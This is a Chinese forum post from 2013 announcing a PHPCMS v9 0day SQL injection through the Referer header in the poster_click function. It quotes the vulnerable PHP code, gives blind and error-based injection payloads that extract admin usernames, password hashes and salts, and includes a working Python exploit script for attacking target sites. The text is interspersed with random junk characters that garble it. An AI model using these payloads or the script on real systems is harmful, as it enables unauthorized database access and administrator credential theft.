有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:. @* Y' k4 c. d# t ~0 Y
2 B9 Q9 S7 H3 P" u问题函数\phpcms\modules\poster\index.php- x% d" R9 V0 E* \$ q
7 s. x+ u* r7 v$ a' x
public function poster_click() { ?. d" W t' H; U
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
) k- R, j1 `' S/ ~$ c) m: r$r = $this->db->get_one(array('id'=>$id));( d9 \) z. i0 V. `( ?
if (!is_array($r) && empty($r)) return false;% r0 e8 a: O5 V. U* L$ _
$ip_area = pc_base::load_sys_class('ip_area');" X+ X& F3 J) f: c- ]1 r* m
$ip = ip();
! l" g/ X9 b L$area = $ip_area->get($ip);4 t# l2 }% P% Y& a
$username = param::get_cookie('username') ? param::get_cookie('username') : '';3 C5 t: d" f { z' Z
if($id) {
$ p9 L+ }4 g1 L3 M" q& g$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();$ ^# @# f0 [9 M$ }$ Q6 P) A6 e
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));" L1 S! E9 K! R" e; s* F
}, T6 N4 l% ^% \. z4 ~
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));. Z. j5 y: j" o7 B% X* [) o; p
$setting = string2array($r['setting']);* D A- R: ^6 h8 {0 c7 i I H
if (count($setting)==1) {2 H" `( B( i5 R7 v) b5 _% e
$url = $setting['1']['linkurl'];
4 y, p# i% P( K( K+ h7 Y} else {
$ n7 x7 l" t: b) V" o9 R$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
1 V5 U- I/ `2 {}. A3 O. X$ K) T& O5 E8 p- h8 H" U
header('Location: '.$url);1 C$ T: K5 I7 w+ ~- l
}
- S3 N' Y, w: _: ^0 ~: ^3 _
* X: I1 u! [) U
% ~9 e' s. T7 `3 u* U6 a( g; e9 O0 x: G8 K) }6 ]( _" I. E
利用方式:1 }* e! B6 a* X6 i0 v7 W/ F
4 i8 k! d/ ~: h1 f5 D# q( b8 h1、可以采用盲注入的手法:
$ R" U- S: H2 _9 h- v+ R! k- A; h Q4 t* R1 O* |4 p. i9 }
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
0 G" [5 m/ K, Z' v" e. |1 m( I1 b1 d9 i3 z
通过返回页面,正常与否一个个猜解密码字段。* i+ t; t% I8 b; W: o" x8 l
7 o& B: c* |% ~$ N
2、代码是花开写的,随手附上了:
* p8 E; p' v: [% f# Z% U/ c
/ v1 F2 G6 Z9 @- D( n( ^+ `/ ?6 B& a6 i1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#. j% a/ D! @; e7 a( R6 Y
/ K* O9 Q, F1 G5 i7 c
此方法是爆错注入手法,原理自查。5 R6 O2 d) G7 V/ F% v1 W$ O3 b
1 Q, O0 @5 X6 L. A; p * G3 ^% K L9 V. `4 j \4 E
7 u v) d& |7 S' O7 p' q" M) A) J
利用程序:3 q) | z7 D! a# c1 @. ~) Y J( o
1 A$ h0 x! j0 X/ [$ V
#!/usr/bin/env python
# X9 }% h8 D S6 o6 R; T* |8 V! [import httplib,sys,re& _7 L- k7 X) t7 l6 Y3 r
$ X! N8 [5 L. ~; {. Adef attack():
, \' I: g, w: Eprint “Code by Pax.Mac Team conqu3r!”
7 ^4 [3 m& t) U6 Cprint “Welcome to our zone!!!”9 K; B4 v# c1 L3 |( |; S5 M1 [: `
url=sys.argv[1]
/ z5 }! Z+ j4 d* Bpaths=sys.argv[2]5 x! ?# T2 D: O
conn = httplib.HTTPConnection(url)
% L" E, I4 C9 _# v1 U4 x# L% Yi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,2 O+ F1 \5 E$ |# O3 R
“Accept”: “text/plain”,' U! l" Z* t% o+ j+ {
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
F Z1 y: e: E- o, @conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
9 F% T( K! G0 p X0 y% rr1 = conn.getresponse()
d3 t0 c0 p7 x8 m( l) ^datas=r1.read()
Y# p* K* p5 r$ L3 d2 B' @datas=re.findall(r”Duplicate entry \’\w+’”, datas) i( W+ ]7 K( U* z( Y! l7 ~
print datas[0]
4 v1 ~' ]7 Y) Dconn.close()
, j- C* i/ B+ A( M/ g* v9 Hif __name__==”__main__”:7 L* G, Z4 ]! I
if len(sys.argv)<3:4 y& ^7 D. ?8 _$ F
print “Code by Pax.Mac Team conqu3r”8 S5 _9 W$ j2 W! \
print “Usgae:”/ L- \. m" s/ Q7 p
print “ phpcmsattack.py www.paxmac.org /”
% `& }1 u- @7 i$ z4 [% u1 n' ?print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”2 ?6 ` |( O0 |6 q! S: Y
sys.exit(1)
5 K; Q* O3 W0 n; l: `! k; [4 U. Xattack()
9 M4 J: d6 F) P- m
& p; _9 u6 U/ u3 { |
发表于 2013-1-11 21:01:00
收藏
支持
反对